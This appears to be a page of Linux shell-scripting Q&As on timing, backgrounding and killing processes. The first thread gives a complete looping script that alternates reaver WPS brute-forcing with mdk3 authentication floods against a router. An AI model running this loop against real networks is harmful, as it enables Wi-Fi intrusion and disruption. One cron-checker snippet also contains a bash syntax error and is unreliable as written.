send control c to a linux command after a specific time interval? - linux

Shell Scripting:
I am doing some testing on my router, using the mdk3 and reaver utilities.
Here are the two commands:
[cmd1] echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv -l 230
[cmd2] sudo mdk3 wlan2mon a -a 00:FF:EE:CC:DS:B6
Goal:
I am trying to create a shell script that will run [cmd1] for 2 minutes, then send ctrl+c to it so that reaver saves its session.
Then [cmd2] will run for 2 minutes and will also stop after that.
These two will run in a loop.
Below is the sample script which I have written; can you add a timer to it?
#!/bin/bash
while :; do echo
echo "running mdk for 2 minutes";
timeout 120 sudo mdk3 wlan2mon a -a 00:FF:EE:CC:DS:B6;
echo "mdk finished";
echo "starting reaver for 2 minutes ";
# here timeout won't work, as only ctrl+c will make reaver save its state.
# add code here to run the reaver utility for two minutes and send ctrl+c to it
echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv;
echo "reaver ran for two minutes";
done

I'm not familiar with the reaver program, but I think the following should work:
# Run reaver as a background process (add &)
echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv &
# Save the process id.
reaverpid=$!
# Sleep 2 minutes
sleep 120
# Send SIGINT, which is what ctrl-c normally does.
kill -SIGINT $reaverpid
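
Dropping that into your loop, a rough sketch of the whole script could look like this (same interface and MAC address as in your commands; untested, since I don't have reaver here):
#!/bin/bash
while :; do
echo "running mdk for 2 minutes"
timeout 120 sudo mdk3 wlan2mon a -a 00:FF:EE:CC:DS:B6
echo "mdk finished"
echo "starting reaver for 2 minutes"
# Run reaver in the background and remember its process id.
echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv &
reaverpid=$!
sleep 120
# SIGINT is what ctrl-c sends, so reaver should save its session.
kill -SIGINT "$reaverpid"
# Give reaver a moment to finish writing the session file before looping.
wait "$reaverpid"
echo "reaver ran for two minutes"
done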

Related

How to wait for first rsync process to complete before running next command in shell/bash script

Below is the script I have. Basically, I just want to copy files from the other server by calling this script. Some files are large, and what happens is that the first rsync command gets killed before it completes and the script proceeds with the next one. I tried to use the screen command, but I'm not sure how to script Ctrl+a d (to detach) in shell/bash.
HFDIR=/var/opt/ubkp/data/local/prework/hotfixes
RODIR=/var/opt/ubkp/data/local/prework/rollouts
THFDIR=$(ls -t /var/opt/ubkp/data/local | grep hotfix | head -1)
TRODIR=$(ls -t /var/opt/ubkp/data/local | grep rollout | grep -v check | head -1)
user=$(/usr/seos/bin/sewhoami)
if [ $user = "root" ]; then
echo "This script should not be run as the TRUE root user"
echo "Log in so that \"sewhoami\" does not display \"root\" and then execute this script."
exit
else
#list of ROs and HFs
list=/tmp/list.txt
echo -n "Enter Password: "
read -s PWD
# first rsync command
/usr/bin/expect<<EOD
spawn rsync -a $user@server:$HFDIR/* /var/opt/ubkp/data/local/$THFDIR
expect "assword"
send "$PWD\r"
wait $!
expect eof
EOD
# second rsync command
/usr/bin/expect<<EOD
spawn rsync -a $user@server:$RODIR/* /var/opt/ubkp/data/local/$TRODIR
expect "assword"
send "$PWD\r"
expect eof
EOD
fi
exit
Your second rsync will be killed after 10 seconds as that is the default timeout for expect eof. You should add a wait after the send, to wait forever until the process ends.
Also, you should remove the $! in the wait. It is a shell variable, not an expect variable. Fortunately, in this case $! is empty because you have not run any commands in the shell in the background with &.
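
For example, the second block with those two fixes applied might look like this (a sketch; everything else stays as in your script, and in the first block wait $! simply becomes wait):
# second rsync command
/usr/bin/expect<<EOD
spawn rsync -a $user@server:$RODIR/* /var/opt/ubkp/data/local/$TRODIR
expect "assword"
send "$PWD\r"
# wait with no argument blocks until the spawned rsync exits,
# so expect eof no longer hits its 10-second default timeout.
wait
expect eof
EOD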

Bash calls two bash scripts

I have the following script:
#!/bin/bash
if [ "$EUID" -ne 0 ]
then
echo ''
echo 'Please run the script as root'
echo ''
exit
fi
for run in {1..11}
do
sudo ./start_ap.sh
sleep 10
sudo ./tst.sh
done
The problem is that after executing
sudo ./start_ap.sh
the next lines will not be executed, because sudo ./start_ap.sh needs Ctrl+C to stop, and only then will the next lines run.
However, I want sudo ./start_ap.sh to be terminated after sudo ./tst.sh finishes, and then the whole step repeated 11 times.
So far, after sudo ./start_ap.sh starts, the following lines are not executed unless I kill its process.
How can I achieve this?
P.S. start_ap.sh starts hostapd, which is why it needs to be killed before the next iteration.
You need to run ./start_ap.sh in the background, then kill it after ./tst.sh completes. Note that if you actually run the script as root, there is no need to use sudo inside the script.
for run in {1..11}; do
./start_ap.sh & pid=$!
sleep 10
./tst.sh
kill "$pid"
done
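
If start_ap.sh exits after launching hostapd, kill "$pid" may not reach hostapd itself. A hedged variant that also stops hostapd by name (the process name hostapd is an assumption based on your P.S.):
for run in {1..11}; do
./start_ap.sh & pid=$!
sleep 10
./tst.sh
kill "$pid"
# Stop hostapd by name in case it outlived start_ap.sh.
# "hostapd" is assumed from the P.S.; adjust if the daemon runs under another name.
pkill -x hostapd
done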

Bash write to background job's stdin after its launch

This is quite naive but I'll give it a shot.
I would like to launch gimp from bash with gimp -i -b - &, then read dbus signals in an endless loop and post the data obtained from those signals back to the gimp instance I launched. gimp -i -b - starts command-line gimp and waits for user input, like gnuplot etc. But is it possible to access its stdin from bash after the command has been started?
Ideally I would like something like that to work:
gimp -i -b - &
dbus-monitor --profile "..." --monitor |
while read -r line; do
gimp -b '(mycommand '$line')' &
done
gimp -b '(gimp-quit 0)' &
where all of the gimp ... & commands are sent to the same gimp instance.
It would be even better if I could close the gimp instance when it has been idle for long enough and start it again when it's needed.
Is it possible with bash without writing some daemon app?
Simple Solution
You could use a simple pipe. Wrap the command-sending part of your script into a function and call that function while piping its output to gimp:
#! /bin/bash
sendCommands() {
dbus-monitor --profile "..." --monitor |
while read -r line; do
echo "(mycommand $line)"
done
echo "(gimp-quit 0)"
}
sendCommands | gimp -i &
sendCommands and gimp -i will run in parallel. Each time sendCommands prints something, that something will land in gimp's stdin.
If that's your complete script, you can omit the & after gimp -i.
Killing and Restarting Gimp
It would be even better if I could close the gimp instance when it has been idle for long enough and start it again when it's needed.
This gets a bit more complicated than just using the timeout command because we don't want to kill gimp while it is still processing some image. We also don't want to kill sendCommands between the consumption of an event and the sending of the corresponding command.
Maybe we could start a helper process to send a dbus-event every 60 seconds. Let said event be called tick. The ticks are also read by sendCommands. If there are two ticks without commands in between, gimp should be killed.
We use FIFOs (also called named pipes) to send commands to gimp. Each time a new gimp process starts, we also create a new FIFO. This ensures that commands targeted at the new gimp process are also sent to the new process. In case gimp cannot finish the pending operations in less than 60 seconds, there may be two gimp processes at the same time.
#! /bin/bash
generateTicks() {
while true; do
# send tick over dbus
sleep 60
done
}
generateTicks &
gimpIsRunning=false
wasActive=false
sleepPID=
fifo=
while read -r line; do
if eventIsTick; then # TODO replace "eventIsTick" with actual code
if [[ "$wasActive" = false ]]; then
echo '(gimp-quit 0)' > "$fifo" # gracefully quit gimp
gimpIsRunning=false
[[ "$sleepPID" ]] && kill "$sleepPID" # close the FIFO
rm -f "$fifo"
fi
wasActive=false
else
if [[ "$gimpIsRunning" = false ]]; then
fifo="$(mktemp -u)"
mkfifo "$fifo"
sleep infinity > "$fifo" & # keep the FIFO open
sleepPID="$!"
gimp -i < "$fifo" &
gimpIsRunning=true
fi
echo "(mycommand $line)" > "$fifo"
wasActive=true
fi
done < <(dbus-monitor --profile "..." --monitor)
echo '(gimp-quit 0)' > "$fifo" # gracefully quit gimp
[[ "$sleepPID" ]] && kill "$sleepPID" # close the FIFO
rm -f "$fifo"
Note that the dbus-monitor ... | while ... done is now written as while ... done < <(dbus-monitor ...). Both versions loop over the output of dbus-monitor, but the version with the pipe | runs the loop in a subshell, which does not allow setting global variables inside the loop. For a further explanation, see SC2031.
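
As a minimal illustration of that difference (unrelated to gimp, just the subshell issue that SC2031 describes):
#! /bin/bash
count=0
# With a pipe, the while loop runs in a subshell, so the increment is lost.
printf 'a\nb\nc\n' | while read -r line; do
count=$((count + 1))
done
echo "after pipe: $count" # prints 0
# With process substitution, the loop runs in the current shell.
while read -r line; do
count=$((count + 1))
done < <(printf 'a\nb\nc\n')
echo "after process substitution: $count" # prints 3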

Debian: Restart process when killed automatically in PuTTY

I would like to know if there is any simple script to automatically restart a screened background process.
The process gets killed, and I couldn't manage to create a working restart script :(.
Thanks in advance! <3
I believe that the safest (but not the easiest) way to do this is to create a cron job that checks whether the process is running and restarts it if it is not. This method is "safer" because if you use a loop like the one ivanivan suggested and that script "crashes", the program will not be restarted again; with cron, on the other hand, the check program is called every minute.
For example, your cron could be:
* * * * * env DISPLAY=:0 /folder/testscript >/dev/null 2>&1
The env DISPLAY=:0 part may or may not be needed, depending on your script (run echo $DISPLAY to find out the value to use in your case).
For example, your testscript could be:
#!/bin/bash
testvar="$(ps aux | grep -s "mainscript" | grep -sv "grep -s mainscript")"
if [ -z "$testvar" ]; then nohup /folder/mainscript &; fi
#sleep and run second test
sleep 30
testvar="$(ps aux | grep -s "mainscript" | grep -sv "grep -s mainscript")"
if [ -z "$testvar" ]; then nohup /folder/mainscript &; fi
exit 0
In the example above, the testscript checks whether mainscript is running (and restarts it if necessary) twice every minute.
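
If pgrep is available, the same check can be written more compactly; this is only a sketch and keeps the hypothetical /folder/mainscript path from above:
#!/bin/bash
# -f matches against the full command line, so the script path is enough.
if ! pgrep -f "/folder/mainscript" > /dev/null; then nohup /folder/mainscript & fi
# sleep and run the second test
sleep 30
if ! pgrep -f "/folder/mainscript" > /dev/null; then nohup /folder/mainscript & fi
exit 0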

why nohup does not launch my script?

Here is my script.sh
for ((i=1; i<=400000; i++))
do
echo "loop $i"
echo
numberps=`ps -ef | grep php | wc -l`;
echo $numberps
if [ $numberps -lt 110 ]
then
php5 script.php &
sleep 0.25
else
echo too much process
sleep 0.5
fi
done
When I launch it with:
./script.sh > /dev/null 2>/dev/null &
that works, except that after I log out from SSH and log in again, I cannot stop the script with kill %1, and jobs -l is empty.
When I try to launch it with
nohup ./script.sh &
It just outputs
nohup: ignoring input and appending output to `nohup.out'
but no php5 processes are running: nohup has no effect at all.
I have 2 alternatives to solve my problem:
1) ./script.sh > /dev/null 2>/dev/null &
If I log out from SSH and log in again, how can I stop this job?
or
2) How can I make nohup run correctly?
Any ideas?
nohup is not supposed to allow you to use jobs -l or kill %1 to kill jobs after logging out and in again.
Instead, you can:
Run the script in the foreground in a GNU Screen or tmux session, which lets you log out, log in, reattach, and continue the same session (see the sketch below).
Use killall script.sh to kill all running instances of script.sh on the server.
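
A minimal screen workflow for this, assuming screen is installed (phploop is just a hypothetical session name):
# Start the script inside a detached, named screen session.
screen -dmS phploop ./script.sh
# Later, after logging back in, reattach to watch it or stop it with Ctrl-C:
screen -r phploop
# Or, without reattaching, kill every running copy of the script:
killall script.sh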
